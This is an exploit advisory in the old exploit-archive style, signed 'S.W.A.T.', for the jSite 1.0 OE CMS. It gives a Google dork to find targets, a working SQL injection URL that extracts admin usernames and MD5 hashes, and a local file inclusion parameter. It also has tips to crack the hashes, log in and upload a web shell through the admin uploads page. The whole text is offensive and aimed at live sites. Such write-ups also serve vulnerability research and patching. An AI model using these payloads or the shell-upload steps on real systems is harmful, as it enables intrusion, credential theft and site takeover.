jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

–== ================================================================================ ==–

–== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==–

–== ================================================================================ ==–

-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.sclek.com/jsite.zip

-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by jSite 1.0 OE"

-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:

You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login 😉

-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:

www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws

(0x3a,user,pass),admin/**/from/**/jsite_users/*

-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

1 Week Off & I Be Back 😀 😉

Admin Login Is At /admin/

U Can Upload Your Shell When U Login Successfully

From This Link: www.site.com/admin/index.php?menu=uploads

& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php

-=-=-=-=-=-=–=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

www.[target].com/Script/index.php?module=[LFI]

–== ================================================================================ ==–

–== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==–

–== ================================================================================ ==–